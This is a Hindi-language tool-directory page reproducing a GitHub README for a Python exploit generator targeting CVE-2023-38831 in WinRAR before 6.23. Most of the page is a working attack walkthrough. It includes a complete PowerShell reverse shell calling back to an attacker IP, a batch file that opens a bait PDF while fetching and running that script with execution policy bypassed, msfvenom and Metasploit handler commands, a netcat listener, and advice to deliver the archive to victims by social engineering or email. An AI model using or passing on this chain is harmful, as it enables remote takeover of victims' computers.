Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-38831-Exploit — इस प्रोजेक्ट में एक Python स्क्रिप्ट है जो **CVE-2023-38831** का शोषण करती है, जो **WinRAR** के 6.23 से पहले के संस्करणों में एक भेद्यता है। यह शोषण एक **दुर्भावनापूर्ण RAR संग्रह** तैयार करता है, जो पीड़ित द्वारा संग्रह के भीतर एक हानिरहित दिखने वाली फ़ाइल (जैसे PDF) खोलने पर मनमाने कोड के निष्पादन को ट्रिगर करता है। | Kitploit
उपकरण/GitHubGitHub/technicalcorp0/cve-2023-38831-exploit
पेलोड जनरेशनशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगसामाजिक इंजीनियरिंगलर्निंग और शिक्षारेड टीमिंग
GitHubtechnicalcorp0/cve-2023-38831-exploit

CVE-2023-38831-Exploit

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

इस प्रोजेक्ट में एक Python स्क्रिप्ट है जो **CVE-2023-38831** का शोषण करती है, जो **WinRAR** के 6.23 से पहले के संस्करणों में एक भेद्यता है। यह शोषण एक **दुर्भावनापूर्ण RAR संग्रह** तैयार करता है, जो पीड़ित द्वारा संग्रह के भीतर एक हानिरहित दिखने वाली फ़ाइल (जैसे PDF) खोलने पर मनमाने कोड के निष्पादन को ट्रिगर करता है।

रिपॉजिटरी देखें
11 साल पहलेअभी तक समीक्षित नहीं
साझा करें

CVE-2023-38831 WinRAR शोषण जनरेटर

द्वारा निर्मित: technical_corp

यह प्रोजेक्ट एक Python स्क्रिप्ट है जो CVE-2023-38831 का शोषण करती है, यह WinRAR के 6.23 से पहले के संस्करणों में एक कमजोरी है। यह शोषण एक दुर्भावनापूर्ण RAR संग्रह उत्पन्न करता है जो पीड़ित द्वारा संग्रह के अंदर एक हानिरहित दिखने वाली फ़ाइल (जैसे PDF) खोलने पर मनमाना कोड निष्पादन को ट्रिगर करता है। यह कमजोरी अप्रैल से अगस्त 2023 तक सक्रिय रूप से शोषित की गई थी।

कमजोरी का अवलोकन

CVE-2023-38831 WinRAR में एक कमजोरी है जो हमलावरों को मनमाना कोड निष्पादित करने की अनुमति देती है जब पीड़ित एक संग्रह खोलता है जिसमें एक हानिरहित फ़ाइल और एक दुर्भावनापूर्ण फ़ोल्डर एक ही नाम के साथ होता है। जब उपयोगकर्ता हानिरहित फ़ाइल के साथ इंटरैक्ट करता है, तो WinRAR गलती से दुर्भावनापूर्ण फ़ोल्डर की सामग्री को संसाधित करता है और हमलावर के पेलोड को निष्पादित करता है।

शोषण की विशेषताएं

  • एक दुर्भावनापूर्ण RAR संग्रह उत्पन्न करता है जिसमें एक चारा फ़ाइल (जैसे PDF) और एक पेलोड (जैसे .bat या .exe फ़ाइल) होता है।
  • चारा फ़ाइल कोई भी उपयोगकर्ता-निर्दिष्ट फ़ाइल (जैसे PDF या दस्तावेज़) हो सकती है।
  • पेलोड कोई भी निष्पादन योग्य या स्क्रिप्ट (जैसे msfvenom का उपयोग करके बनाया गया रिवर्स शेल) हो सकता है।
  • जब पीड़ित चारा फ़ाइल खोलता है, तो पेलोड पृष्ठभूमि में चुपचाप निष्पादित होता है।

पूर्वापेक्षाएँ

  • Python 3.x
  • पीड़ित मशीन पर WinRAR का 6.23 से पहले का संस्करण स्थापित हो (यह कमजोर संस्करण है)।
  • यहाँ से WinRAR 6.22 डाउनलोड करें
  • Metasploit Framework (वैकल्पिक, पेलोड उत्पन्न करने के लिए)।

उपयोग कैसे करें

इस रिपॉजिटरी को क्लोन करें:

root@kitploit:~
git clone https://github.com/technical_corp/CVE-2023-38831-Exploit.git
cd CVE-2023-38831-Exploit

हम एक .rar संग्रह में एम्बेडेड बैच फ़ाइल का उपयोग करके एक होस्टेड PowerShell रिवर्स शेल को डाउनलोड और निष्पादित करेंगे।

चरण:

PowerShell रिवर्स शेल स्क्रिप्ट बनाएं:

अपनी Kali Linux मशीन पर निम्न PowerShell स्क्रिप्ट को reverse.ps1 के रूप में सहेजें:

root@kitploit:~
$client = New-Object System.Net.Sockets.TCPClient('<attacker_ip>',<attacker_port>);
$stream = $client.GetStream();
[byte[]]$buffer = 0..65535|%{0};
while(($i = $stream.Read($buffer, 0, $buffer.Length)) -ne 0){
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($buffer,0, $i);
    $sendback = (iex $data 2>&1 | Out-String );
    $sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
    $stream.Write($sendbyte,0,$sendbyte.Length);
    $stream.Flush()};
$client.Close()

<attacker_ip> को अपनी Kali Linux मशीन के IP से बदलें।

<attacker_port> को उस पोर्ट नंबर से बदलें जिस पर आप सुनेंगे।

अपनी Kali Linux मशीन पर PowerShell स्क्रिप्ट होस्ट करें:

उस फ़ोल्डर पर जाएँ जहाँ PowerShell स्क्रिप्ट सहेजी गई है:

root@kitploit:~
cd /path/to/powershell-script

फ़ाइल को पोर्ट 80 पर होस्ट करने के लिए Python के HTTP सर्वर का उपयोग करें:

root@kitploit:~
python3 -m http.server 80

इससे reverse.ps1 http://<attacker_ip>/reverse.ps1 पर उपलब्ध हो जाएगा।

PowerShell स्क्रिप्ट डाउनलोड और चलाने के लिए एक बैच फ़ाइल बनाएं:

एक बैच फ़ाइल (script.bat) बनाएं जो PowerShell रिवर्स शेल को डाउनलोड और निष्पादित करेगी:

root@kitploit:~
@echo off
:: Open the legitimate PDF
start bait.pdf

:: Download and execute the PowerShell script
powershell -Command "Invoke-WebRequest -Uri 'http://<attacker_ip>/reverse.ps1' -OutFile 'C:\Users\Public\reverse.ps1'; Start-Process powershell -ArgumentList '-ExecutionPolicy Bypass -File C:\Users\Public\reverse.ps1' -NoNewWindow"
exit

बैच फ़ाइल को एम्बेड करने के लिए CVE-2023-38831 शोषण स्क्रिप्ट का उपयोग करें:

एक वैध PDF में बैच फ़ाइल को एम्बेड करने के लिए WinRAR शोषण स्क्रिप्ट चलाएँ:

root@kitploit:~
python3 CVE-2023-38831-WinRar-Exploit.py -b legitimate.pdf -p script.bat -o POC.rar

यह कमांड POC.rar फ़ाइल बनाता है, जिसमें script.bat होता है जो रिवर्स शेल को निष्पादित करेगा।

Kali Linux पर Netcat लिसनर सेट अप करें:

रिवर्स शेल को पकड़ने के लिए Netcat लिसनर शुरू करें:

root@kitploit:~
nc -lvnp <attacker_port>

पीड़ित को शोषण (POC.rar) वितरित करें:

जैसे ही पीड़ित POC.rar खोलता है और PDF फ़ाइल निष्पादित करता है, script.bat ट्रिगर हो जाएगा। स्क्रिप्ट आपके सर्वर से PowerShell रिवर्स शेल डाउनलोड और निष्पादित करेगी। आपको अपने Netcat लिसनर पर एक रिवर्स शेल कनेक्शन प्राप्त होगा।

तत्काल निष्पादन के बिना एक निष्पादन योग्य का उपयोग करना:

एक पेलोड उत्पन्न करें (यदि Metasploit का उपयोग कर रहे हैं): आप msfvenom का उपयोग करके एक रिवर्स शेल पेलोड बना सकते हैं:

root@kitploit:~
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_IP> LPORT=<attacker_port> -f exe > payload.exe

बनाई गई payload.exe फ़ाइल को CVE-2023-WinRAR-Exploit निर्देशिका में ले जाएँ

शोषण जनरेटर चलाएँ: एक दुर्भावनापूर्ण RAR फ़ाइल उत्पन्न करने के लिए Python स्क्रिप्ट चलाएँ:

root@kitploit:~
python cve-2023-38831-exploiter.py -b nmapcheatsheet.pdf -p payload.exe -o POC.rar

-b: चारा फ़ाइल निर्दिष्ट करें (जैसे, nmapcheatsheet.pdf)। -p: पेलोड फ़ाइल निर्दिष्ट करें (जैसे, script.bat या payload.exe)। -o: आउटपुट फ़ाइल नाम निर्दिष्ट करें (जैसे, POC.rar)।

पीड़ित को RAR फ़ाइल वितरित करें: उत्पन्न malicious_archive.rar को सोशल इंजीनियरिंग, ईमेल अटैचमेंट या फ़ाइल-शेयरिंग प्लेटफॉर्म के माध्यम से पीड़ित तक पहुँचाया जा सकता है।

एक लिसनर सेट अप करें (यदि Metasploit का उपयोग कर रहे हैं): अपनी हमलावर मशीन पर, रिवर्स शेल को पकड़ने के लिए एक लिसनर सेट अप करें:

root@kitploit:~
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <attacker_IP>
set LPORT <attacker_port>
exploit

शोषण कार्यप्रवाह

  • हमलावर पीड़ित को एक दुर्भावनापूर्ण RAR फ़ाइल वितरित करता है।
  • पीड़ित चारा फ़ाइल (जैसे, nmapcheatsheet.pdf) खोलता है, जो चुपचाप पेलोड को ट्रिगर करता है।
  • पेलोड (जैसे, एक रिवर्स शेल) पृष्ठभूमि में निष्पादित होता है, जिससे हमलावर को पीड़ित के सिस्टम पर नियंत्रण मिल जाता है।

अस्वीकरण

यह प्रोजेक्ट केवल शैक्षिक उद्देश्यों के लिए है। लेखक इस शोषण के किसी भी दुरुपयोग की जिम्मेदारी नहीं लेता है। इसका उपयोग केवल अधिकृत वातावरण या पूर्ण सहमति के साथ पैठ परीक्षण परिदृश्यों में किया जाना चाहिए।

टूल डाउनलोड करें